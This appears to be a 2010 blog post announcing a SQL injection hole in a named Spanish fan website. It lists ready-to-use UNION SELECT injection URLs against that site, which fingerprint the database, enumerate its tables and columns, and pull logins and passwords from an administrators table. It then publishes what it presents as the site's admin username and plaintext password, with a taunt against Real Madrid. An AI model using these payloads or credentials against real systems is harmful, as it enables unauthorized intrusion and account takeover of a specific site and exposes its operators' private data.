#Title: Cronaldo7.es Sql injection Vulnerability
#Risk: (4/5)
#Release Date: 29.08.2010
#Vulnerability discovered by: darknessn1k0!a
------------------------------------------------------------------------
http://www.cronaldo7.es/news_detail.php?id=-10%20union%20all%20select%201,2,@@version,4,5--
http://www.cronaldo7.es/news_detail.php?id=-10%20union%20all%20select%201,2,group_concat(column_name),4,5+from+information_schema.columns--
http://www.cronaldo7.es/news_detail.php?id=-10%20union%20all%20select%201,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--
http://www.cronaldo7.es/news_detail.php?id=-10%20union%20all%20select%201,2,group_concat(login,0x3a,pass),4,5+from+administradores--
++++++++++++++++++++++++++++
+Ussername: sergio_admin
+Password: astilla
+++++++++++++++++++++++++++
< Because i hate Real Madrid >
Monday, August 30, 2010
Cronaldo7.es Sql injection Vulnerability [Full Injecton]
0
About Me
- За Zer0-0ne
- Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4
0 comments:
Post a Comment